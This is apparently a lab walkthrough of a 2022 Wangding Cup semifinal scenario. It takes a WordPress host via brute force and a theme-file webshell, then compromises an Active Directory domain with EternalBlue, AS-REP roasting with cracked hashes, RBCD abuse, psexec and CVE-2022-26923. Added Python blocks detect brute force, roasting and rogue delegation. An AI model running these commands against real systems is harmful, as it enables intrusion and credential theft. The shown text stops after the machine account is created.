春秋云镜 - 2022 网鼎杯 Semifinal Walkthrough


┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 39.98.112.16 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-02 02:06 EDT
Nmap scan report for 39.98.112.16
Host is up (0.00020s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 135.21 seconds

Only ports 22 and 80 are open.

Visiting port 80 shows an unmistakable WordPress site.

wpscan enumerates an admin user, and brute-forcing its password yields admin / 123456.

[!] Valid Combinations Found:
| Username: admin, Password: 123456
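From the defender's side, the wpscan run above leaves a very recognizable trace in the web server's access log: a burst of POSTs to wp-login.php that all come back 200 (WordPress re-renders the login form on a wrong password), followed by a 302 to wp-admin once a guess is accepted. The block below is an added example, not code from this writeup, that implements that detection over constructed combined-format log lines; the client IPs, timestamps, user agents and the 5-in-5-minutes threshold are all assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOGIN_PATH = "/wp-login.php"
# Combined log format: ip ident user [timestamp] "METHOD path HTTP/x" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Constructed access-log sample (not from the writeup): six failed POSTs within three
# seconds from one address, then a 302 meaning a password was accepted; a second
# address logs in normally on the first try.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Apr/2025:02:10:01 -0400] "POST /wp-login.php HTTP/1.1" 200 3412 "-" "WPScan v3.8.25"
203.0.113.7 - - [02/Apr/2025:02:10:01 -0400] "POST /wp-login.php HTTP/1.1" 200 3412 "-" "WPScan v3.8.25"
203.0.113.7 - - [02/Apr/2025:02:10:02 -0400] "POST /wp-login.php HTTP/1.1" 200 3412 "-" "WPScan v3.8.25"
203.0.113.7 - - [02/Apr/2025:02:10:02 -0400] "POST /wp-login.php HTTP/1.1" 200 3412 "-" "WPScan v3.8.25"
203.0.113.7 - - [02/Apr/2025:02:10:03 -0400] "POST /wp-login.php HTTP/1.1" 200 3412 "-" "WPScan v3.8.25"
203.0.113.7 - - [02/Apr/2025:02:10:03 -0400] "POST /wp-login.php HTTP/1.1" 200 3412 "-" "WPScan v3.8.25"
203.0.113.7 - - [02/Apr/2025:02:10:04 -0400] "POST /wp-login.php HTTP/1.1" 302 0 "-" "WPScan v3.8.25"
198.51.100.9 - - [02/Apr/2025:02:11:30 -0400] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.9 - - [02/Apr/2025:02:11:35 -0400] "GET /wp-admin/ HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return a dict with ip, ts (aware datetime), method, path, status; None if unparseable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    ev["status"] = int(ev["status"])
    ev["path"] = ev["path"].split("?", 1)[0]   # ignore query strings such as ?action=lostpassword
    return ev


def detect_login_bruteforce(lines, threshold=5, window=timedelta(minutes=5)):
    """Per source IP, count failed wp-login.php POSTs (status 200) inside a sliding
    window; flag the IP once the threshold is reached and record whether a 302
    (successful login) followed the burst."""
    by_ip = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev and ev["method"] == "POST" and ev["path"] == LOGIN_PATH:
            by_ip[ev["ip"]].append(ev)

    findings = {}
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e["ts"])
        recent = []   # timestamps of failures still inside the window
        for ev in events:
            if ev["status"] == 200:
                recent = [t for t in recent if ev["ts"] - t <= window] + [ev["ts"]]
                if len(recent) >= threshold:
                    entry = findings.setdefault(ip, {"failures": 0, "success_after": False})
                    entry["failures"] = len(recent)
            elif ev["status"] == 302 and ip in findings:
                findings[ip]["success_after"] = True
    return findings


if __name__ == "__main__":
    for ip, info in detect_login_bruteforce(SAMPLE_LOG.splitlines()).items():
        print("%s: %d failed logins, success afterwards: %s" % (ip, info["failures"], info["success_after"]))
```

The "success_after" flag is the part worth alerting on with high priority: a burst of 200s that ends in a 302 is a guessed password, not just noise, and is the moment to reset the account and look for theme-file edits like the one described next.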

After logging in to the admin backend, edit a theme file to get a shell.

Visit /wp-content/themes/twentytwentyone/404.php and connect with AntSword (蚁剑).

flag01 is in the root directory.

Check the network configuration, then upload fscan to scan the internal network.

(www-data:/tmp) $ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:16:3e:2d:a8:bd brd ff:ff:ff:ff:ff:ff
    inet 172.22.15.26/16 brd 172.22.255.255 scope global dynamic eth0
       valid_lft 1892159075sec preferred_lft 1892159075sec
    inet6 fe80::216:3eff:fe2d:a8bd/64 scope link
       valid_lft forever preferred_lft forever
$ ./fscan -h 172.22.15.26/16 -time 10
___ _
/ _ \ _ __ __ _ _ __ __ _ _ __| | __
/ /_\/____/ _ _|/ _ _| '_ _/ _` |/ __| |/ /
/ /_\\_ ____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \_ _,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.15.13 is alive
(icmp) Target 172.22.15.18 is alive
(icmp) Target 172.22.15.24 is alive
(icmp) Target 172.22.15.35 is alive
[*] Icmp alive hosts len is: 4
172.22.15.24:3306 open
172.22.15.35:445 open
172.22.15.13:445 open
172.22.15.18:445 open
172.22.15.35:139 open
172.22.15.24:139 open
172.22.15.18:139 open
172.22.15.13:139 open
172.22.15.35:135 open
172.22.15.24:135 open
172.22.15.13:135 open
172.22.15.18:135 open
172.22.15.24:80 open
172.22.15.18:80 open
172.22.15.24:445 open
172.22.15.13:88 open
[*] alive ports len is: 16
start vulscan
[*] NetInfo:
[*]172.22.15.24
[->] XR-WIN08
[->] 172.22.15.24
[*] NetInfo:
[*]172.22.15.35
[->] XR-0687
[->] 172.22.15.35
[*] NetBios: 172.22.15.35 XIAORANG\XR-0687
[*] NetInfo:
[*]172.22.15.18
[->] XR-CA
[->] 172.22.15.18
[*] NetInfo:
[*]172.22.15.13
[->] XR-DC01
[->] 172.22.15.13
[+] 172.22.15.24 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] 172.22.15.13 (Windows Server 2016 Standard 14393)
[*] NetBios: 172.22.15.13 [+]DC XR-DC01.xiaorang.lab Windows Server 2016 Standard 14393
[*] NetBios: 172.22.15.24 WORKGROUP\XR-WIN08 Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] Webtoc: true
title: http://172.22.15.18 code: 200 len: 703 toc: true
title: IIS Windows Server
[*] NetBios: 172.22.15.18 XR-CA.xiaorang.lab Windows Server 2016 Standard 14393
[*] Webtoc: true
title: http://172.22.15.24 code: 302 len: 0 toc: true
title: None 跳转 url: http://172.22.15.24/www
[*] Webtoc: true
title: http://172.22.15.24/www/sys/index.php code: 200 len: 135 toc: true
title: None
[+] http://172.22.15.18 poc-yaml-active-directory-certsrv-detect
已完成 16/16
[*] 扫描结束, 耗时: 23.238579924s

172.22.15.24 is vulnerable to MS17-010, so msf can be used directly; a proxy into the internal network has to be set up first, and Venom makes that easy.

proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 172.22.15.24
exploit

flag02 is in C:\users\administrator\flag. Add a new user and connect over Remote Desktop.

net user ll Asd123123 /add
net localgroup administrators ll /add

The database password can be found on this host, and the site also exposes a phpMyAdmin; log in with root:root@#123 and export the user table from the zdoo database.

# Domain users
lixiuying@xiaorang.lab
jiaxiaoliang@xiaorang.lab
wanglihong@xiaorang.lab
huachunmei@xiaorang.lab
zhangxinyu@xiaorang.lab
huzhigang@xiaorang.lab
lihongxia@xiaorang.lab
wangyulan@xiaorang.lab
chenjianhua@xiaorang.lab
zhangyi@xiaorang.lab
zhangli@xiaorang.lab
zhangwei@xiaorang.lab
liuqiang@xiaorang.lab
wangfang@xiaorang.lab
wangwei@xiaorang.lab
lixiaoliang@xiaorang.lab
wanghao@xiaorang.lab

Put the obtained accounts into user.txt.

Try AS-REP Roasting to recover user passwords.

┌──(root㉿kali)-[~/Desktop/tmp]
└─# impacket-GetNPUsers xiaorang.lab/ -dc-ip 172.22.15.13 -usersfile users.txt -format hashcat
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

/usr/share/doc/python3-impacket/examples/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:28dc48860e014c6d18a29bad65ba6cc8$b6924f808e7a4d56bd403bc0e5286ad6b1cb1a39ee59331e484a90801fa82bbcb6b685236b61c5976a05330006b74f304fcfb56793de9c78d38caa16075bef947ad898c8b1130dad240a8298a98e86f18af90cebb015502c7758d6a32c366a42395d08877902d303ee0662540653b3c87c14d6d5319b63e5c5eaf6250d7e82d48d57afc56492344b618b054d6a75cf5ee014f00e92311479dba0ccb54c77b072213a42b79862f913a77a6b0fae4f9a67755ca83b583220c30b6f77296098c71bb42a2cbd8197bcd4e30598ecfbf519899b44cc5d723a4a49fc26db1a4b678a1afd4acea4b42b72949e677edd
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$huachunmei@xiaorang.lab@XIAORANG.LAB:2fad79d14745c573303bd34c39f80e7f$0d9522fc4669f0e04b80e36cef3370c1cce5e232e2b131d6d652c7e2dad452a86918cfbd25e78a701896943ba6b50e241f27b8af4b5d79cffef11fd4ee2392325a468f8ff648e70a74e7d9d2ce58990dc91b36a5c84c2ffa7f45e7cdd852dc2a8df1e5e2f9491eb5c5753cdf54cac6cc2eed2a8b9b58c3693b058fcb6a6187ae49c4d80732aa40e0e3296313962128d414b85f75cb87af301ca39664fffc192e1b62755178c4c6b8f13dd70ff912c4f637a970f33bc367e84e4c1dcb31ade4a20b0bdf8bd7c64c19adf091f4850a8ea2c7a7428bbcb17ef7c87e02ae3b5f9637902612ba8fbe65b7599a7d7e
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User lihongxia@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wangyulan@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User chenjianhua@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

Two tickets came back; crack them with hashcat.

┌──(root㉿kali)-[~/Desktop/tmp]
└─# hashcat -m 18200 user.txt /usr/share/wordlists/rockyou.txt --show
[proxychains] DLL init: proxychains-ng 4.17
$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:dbd1dee4c07eea9541a9f1af91b93180$b4d238908b8d37009f9dfb5402a13f1b60567f4f8185fbbf5c9fbefe14bbe0b1f89980cd604ff68b572afe6af2d1bb4d6720abc8bdc51e47df9da3ebb4801d08f8be90c12343699eff8855dbfc0d63e796ffcec62169fa4e3ee97440ca0eb2eb985e6785f93aa1d34444235b1ce8937acf0121fe05ec2c589ba625fab1c90bd168637124f99378007fa9c459b07f946a65d3c7131cdad16af4b591becc04526125e2c255072df4a32214d393aab5f27cff28b66859c1b9bb06600d4c7a51cd7ae583d4602fd1ebd6ffc269ee60ed861abb28bb547de5e848955d5279d9e08523edb67fbd171d1af1730f2fba:winniethepooh
$krb5asrep$23$huachunmei@xiaorang.lab@XIAORANG.LAB:c640ad4dd669f00b128bad8d1ef8df86$0b8e74c7b36ec7daceb707ce176d18a8d15f8cd3ba3154f8ae4f29e9e54f538ab19bc766ea554698677d7f1e6f9418fd7419d82a1ca79582ed70f3de5b5c771a6e7df373fc84a9921b697e7c7d42c17e85f1b2ae73b1ec15bf1bbc59e20bfb2d4e5e52c53c1e88da9c0815434acd8298948f7becb0f15bfdcce4153d025570249523f7507c20f694f5e0ec23c8e7ef5d446aa5fec15315ab314658fc36befc39d7cdf037fa1f165a83ab257fa34a17c4b512ccca27284b97d8f7bdf51cdb0a069e2df4f952c3c52fa47fb58a0fe4e80d0907062fad92edf4d799306ddb103468accf1c2a6b172f2bd7d7c61d:1qaz2wsx
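The KDC side of the GetNPUsers run above is visible in Security event 4768 on the domain controller. A TGT issued with Pre-Authentication Type 0 and Ticket Encryption Type 0x17 (RC4-HMAC, the "$krb5asrep$23$" prefix in the hashes) is the roasting signature, and the stream of KDC_ERR_C_PRINCIPAL_UNKNOWN and "doesn't have UF_DONT_REQUIRE_PREAUTH set" responses shows up as a single client address producing 0x6 and 0x19 failures for many different names. The block below is an added example, not code from the writeup, of both rules plus the LDAP-side check for the 0x400000 userAccountControl bit that makes an account roastable; the event records and account export are constructed sample data modelled on the output above.

```python
from collections import defaultdict

RC4_HMAC = 0x17                      # etype 23: the "$krb5asrep$23$" prefix of the hashes above
UF_DONT_REQUIRE_PREAUTH = 0x400000   # userAccountControl bit that GetNPUsers looks for
KDC_ERR_C_PRINCIPAL_UNKNOWN = 0x6    # "Client not found in Kerberos database"
KDC_ERR_PREAUTH_REQUIRED = 0x19      # answer for accounts that do require pre-authentication

# Constructed Security-log 4768 records (EventData fields only), modelled on the sweep
# above: two accounts issued a TGT without pre-auth, three refused with 0x19, two
# unknown names, plus one ordinary workstation logon. Sample data, not real log output.
SAMPLE_4768 = [
    {"TargetUserName": "lixiuying",    "IpAddress": "::ffff:172.22.15.24", "PreAuthType": "0", "TicketEncryptionType": "0x17",       "Status": "0x0"},
    {"TargetUserName": "jiaxiaoliang", "IpAddress": "::ffff:172.22.15.24", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff", "Status": "0x6"},
    {"TargetUserName": "wanglihong",   "IpAddress": "::ffff:172.22.15.24", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff", "Status": "0x6"},
    {"TargetUserName": "huachunmei",   "IpAddress": "::ffff:172.22.15.24", "PreAuthType": "0", "TicketEncryptionType": "0x17",       "Status": "0x0"},
    {"TargetUserName": "lihongxia",    "IpAddress": "::ffff:172.22.15.24", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff", "Status": "0x19"},
    {"TargetUserName": "wangyulan",    "IpAddress": "::ffff:172.22.15.24", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff", "Status": "0x19"},
    {"TargetUserName": "chenjianhua",  "IpAddress": "::ffff:172.22.15.24", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff", "Status": "0x19"},
    {"TargetUserName": "XR-0687$",     "IpAddress": "::ffff:172.22.15.35", "PreAuthType": "2", "TicketEncryptionType": "0x12",       "Status": "0x0"},
]

# Constructed LDAP export of userAccountControl values
# (0x10200 = NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD).
SAMPLE_USERS = [
    {"sAMAccountName": "lixiuying",  "userAccountControl": 0x10200 | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "huachunmei", "userAccountControl": 0x10200 | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "lihongxia",  "userAccountControl": 0x10200},
]


def asrep_roast_hits(events):
    """Single-event rule: a TGT issued (Status 0x0) with no pre-authentication and RC4
    encryption is exactly the exchange that yields a crackable $krb5asrep$23$ hash."""
    return [(ev["IpAddress"], ev["TargetUserName"]) for ev in events
            if int(ev["Status"], 16) == 0 and ev["PreAuthType"] == "0"
            and int(ev["TicketEncryptionType"], 16) == RC4_HMAC]


def asrep_sweep_sources(events, min_accounts=5):
    """Aggregate rule: one client address driving pre-auth-less requests for many distinct
    names, most of them failing with 0x6 or 0x19, is a user list being tried against the KDC."""
    touched = defaultdict(set)
    for ev in events:
        status = int(ev["Status"], 16)
        if status in (KDC_ERR_C_PRINCIPAL_UNKNOWN, KDC_ERR_PREAUTH_REQUIRED) or (status == 0 and ev["PreAuthType"] == "0"):
            touched[ev["IpAddress"]].add(ev["TargetUserName"])
    return {ip: sorted(names) for ip, names in touched.items() if len(names) >= min_accounts}


def accounts_without_preauth(users):
    """Preventive check: every account with DONT_REQUIRE_PREAUTH set can be roasted offline."""
    return sorted(u["sAMAccountName"] for u in users if u["userAccountControl"] & UF_DONT_REQUIRE_PREAUTH)


if __name__ == "__main__":
    print("roasted:", asrep_roast_hits(SAMPLE_4768))
    print("sweep sources:", asrep_sweep_sources(SAMPLE_4768))
    print("accounts to fix:", accounts_without_preauth(SAMPLE_USERS))
```

The single-event rule fires on the two accounts that the writeup cracked; the aggregate rule flags 172.22.15.24 (the compromised web server) because it touched seven names in one sweep, which is what distinguishes this from a legitimate client with one misconfigured account. The preventive check is the cheaper fix: clear the flag, or at least move those accounts to AES-only so the hash type stops being 23.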

Use BloodHound for domain enumeration.

┌──(root㉿kali)-[~/Desktop/tmp]
└─# bloodhound-python -u lixiuying -p winniethepooh -d xiaorang.lab -dc XR-DC01.xiaorang.lab -c all --dns-tcp -ns 172.22.15.13 --auth-method ntlm --zip
INFO: Found AD domain: xiaorang.lab
INFO: Connecting to LDAP server: XR-DC01.xiaorang.lab
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 3 computers
INFO: Connecting to LDAP server: XR-DC01.xiaorang.lab
INFO: Found 37 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: XR-CA.xiaorang.lab
INFO: Querying computer: XR-0687.xiaorang.lab
INFO: Querying computer: XR-DC01.xiaorang.lab
INFO: Done in 00M 05S
INFO: Compressing output into 20250402040344_bloodhound.zip

The domain user LIXIUYING has GenericWrite over the computer XR-0687$.

By modifying the target's msDS-AllowedToActOnBehalfOfOtherIdentity attribute (configuring RBCD), SYSTEM on the target can be obtained.

Add a machine account:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# impacket-addcomputer -computer-name 'EVILCOMPUTER$' -computer-pass '123@#ABC' -dc-host XR-DC01.xiaorang.lab -dc-ip 172.22.15.13 'xiaorang.lab/lixiuying:winniethepooh'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Successfully added machine account EVILCOMPUTER$ with password 123@#ABC.

Then configure RBCD:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# impacket-rbcd 'xiaorang.lab/lixiuying:winniethepooh' -action write -delegate-from 'EVILCOMPUTER$' -delegate-to 'XR-0687$' -dc-ip 172.22.15.13
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] EVILCOMPUTER$ can now impersonate users on XR-0687$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] EVILCOMPUTER$ (S-1-5-21-3745972894-1678056601-2622918667-1147)
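What impacket-rbcd wrote above is a binary security descriptor: msDS-AllowedToActOnBehalfOfOtherIdentity holds a self-relative SECURITY_DESCRIPTOR whose DACL has one ACCESS_ALLOWED ACE per account permitted to use S4U2Proxy against the host, which is why the tool prints the SID of EVILCOMPUTER$ at the end. Auditing this attribute across all computer objects is the corresponding defensive control, because a delegation granted to a freshly created machine account is exactly what this step looks like from the directory. The block below is an added example, not code from the writeup or from impacket: it decodes the descriptor, lists the delegated SIDs and flags any not on an approved list. The EVILCOMPUTER$ SID is the one printed above; the ...-1105 SID, the approved-delegation mapping and the LDAP snapshot are constructed, and the builder exists only to produce test blobs in the on-disk layout.

```python
import struct

ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000


def sid_to_bytes(sid):
    """'S-1-5-21-...' -> binary SID: revision, sub-authority count, 48-bit authority, sub-authorities."""
    parts = sid.split("-")
    rev, authority, subs = int(parts[1]), int(parts[2]), [int(p) for p in parts[3:]]
    return (struct.pack("<BB", rev, len(subs)) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(buf, off):
    """Decode the binary SID at offset off; return (string form, byte length)."""
    rev, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(str(s) for s in subs)), 8 + 4 * count


def allowed_sids(sd):
    """SIDs granted by ACCESS_ALLOWED ACEs in the DACL of a self-relative security
    descriptor, i.e. the accounts allowed to act on behalf of other identities here."""
    _, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)   # ACL header is 8 bytes
    off, sids = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from("<BBH", sd, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sids.append(bytes_to_sid(sd, off + 8)[0])   # skip 4-byte ACE header + 4-byte mask
        off += ace_size
    return sids


def build_rbcd_sd(sids, owner="S-1-5-32-544"):
    """Test fixture only: assemble a self-relative SD (header | owner | group | DACL)
    with one ACCESS_ALLOWED ACE per SID, so the decoder can be exercised offline."""
    aces = b"".join(struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(b), 0x000F01FF) + b
                    for b in map(sid_to_bytes, sids))
    dacl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(sids), 0) + aces
    owner_b = sid_to_bytes(owner)
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         20, 20 + len(owner_b), 0, 20 + 2 * len(owner_b))
    return header + owner_b + owner_b + dacl


def audit_rbcd(computers, approved):
    """Every (computer, delegated SID) pair not present in the approved mapping."""
    findings = []
    for comp in computers:
        blob = comp.get("msDS-AllowedToActOnBehalfOfOtherIdentity")
        if not blob:
            continue
        for sid in allowed_sids(blob):
            if sid not in approved.get(comp["sAMAccountName"], set()):
                findings.append((comp["sAMAccountName"], sid))
    return findings


# SID of EVILCOMPUTER$ as printed by impacket-rbcd above; the ...-1105 SID is a constructed
# placeholder for a legitimately delegated front-end account in the same domain.
EVIL_SID = "S-1-5-21-3745972894-1678056601-2622918667-1147"
APPROVED_SID = "S-1-5-21-3745972894-1678056601-2622918667-1105"
APPROVED = {"XR-CA$": {APPROVED_SID}}
# Constructed LDAP snapshot of the three computers the BloodHound run found.
SAMPLE_COMPUTERS = [
    {"sAMAccountName": "XR-DC01$", "msDS-AllowedToActOnBehalfOfOtherIdentity": None},
    {"sAMAccountName": "XR-CA$",   "msDS-AllowedToActOnBehalfOfOtherIdentity": build_rbcd_sd([APPROVED_SID])},
    {"sAMAccountName": "XR-0687$", "msDS-AllowedToActOnBehalfOfOtherIdentity": build_rbcd_sd([EVIL_SID])},
]

if __name__ == "__main__":
    for host, sid in audit_rbcd(SAMPLE_COMPUTERS, APPROVED):
        print("unapproved RBCD on %s -> %s" % (host, sid))
```

Feed `audit_rbcd` the raw attribute bytes from an LDAP export and the only allowed entries are the delegations you actually designed; resolving each flagged SID to its account name also surfaces the ms-DS-MachineAccountQuota problem, since the delegate here is a machine account nobody in IT created. The write itself is logged as event 5136 on the DC when directory service change auditing is enabled.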

Request a service ticket impersonating the domain admin:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# impacket-getST xiaorang.lab/EVILCOMPUTER$:'123@#ABC' -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
/usr/share/doc/python3-impacket/examples/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2self
/usr/share/doc/python3-impacket/examples/getST.py:607: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:659: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_XR-0687.xiaorang.lab@XIAORANG.LAB.ccache
┌──(root㉿kali)-[~/Desktop/tmp]
└─# export KRB5CCNAME=Administrator@cifs_XR-0687.xiaorang.lab@XIAORANG.LAB.ccache

┌──(root㉿kali)-[~/Desktop/tmp]
└─# impacket-psexec 'xiaorang.lab/administrator@XR-0687.xiaorang.lab' -target-ip 172.22.15.35 -codec gbk -no-pass -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on 172.22.15.35.....
[*] Found writable share ADMIN$
[*] Uploading file RHzxEZPZ.exe
[*] Opening SVCManager on 172.22.15.35.....
[*] Creating service etRo on 172.22.15.35.....
[*] Starting service etRo.....
[!] Press help for extra shell commands
Microsoft Windows [版本 10.0.20348.1668]
(c) Microsoft Corporation。保留所有权利。

C:\Windows\system32>

flag03 is in C:\users\Administrator\flag\

Host 172.22.15.18 (XR-CA) is vulnerable to CVE-2022-26923.

Exploiting CVE-2022-26923

Locate the certificate server and look for exploitable certificate templates:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# certipy-ad find -u lixiuying@xiaorang.lab -p winniethepooh -dc-ip 172.22.15.13 -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'xiaorang-XR-CA-CA' via CSRA
[!] Got error while trying to get CA configuration for 'xiaorang-XR-CA-CA' via CSRA: Could not connect: [Errno 111] Connection refused
[*] Trying to get CA configuration for 'xiaorang-XR-CA-CA' via RRP
[!] Got error while trying to get CA configuration for 'xiaorang-XR-CA-CA' via RRP: [Errno Connection error (224.0.0.1:445)] [Errno 111] Connection refused
[!] Failed to get CA configuration for 'xiaorang-XR-CA-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : xiaorang-XR-CA-CA
DNS Name : XR-CA.xiaorang.lab
Certificate Subject : CN = xiaorang-XR-CA-CA, DC = xiaorang, DC = lab
Certificate Serial Number : 3ECFB0112E93BE9041059FA6DBB3C35A
Certificate Validity Start : 2023-06-03 07:19:59+00:00
Certificate Validity End : 2028-06-03 07:29:58+00:00
Web Enrollment : Disabled
User Specified SAN : Unknown
Request Disposition : Unknown
Enforce Encryption for Requests : Unknown
Certificate Templates : [!] Could not find any certificate templates

Use certipy to create a machine account and point its dNSHostName attribute at the domain controller:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# certipy-ad account create -u lixiuying@xiaorang.lab -p winniethepooh -dc-ip 172.22.15.13 -user 'EVILCOMPUTER2$' -pass '123@#ABC' -dns 'XR-DC01.xiaorang.lab'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Creating new account:
sAMAccountName : EVILCOMPUTER2$
unicodePwd : 123@#ABC
userAccountControl : 4096
servicePrincipalName : HOST/EVILCOMPUTER2
RestrictedKrbHost/EVILCOMPUTER2
dnsHostName : XR-DC01.xiaorang.lab
[*] Successfully created account 'EVILCOMPUTER2$' with password '123@#ABC'

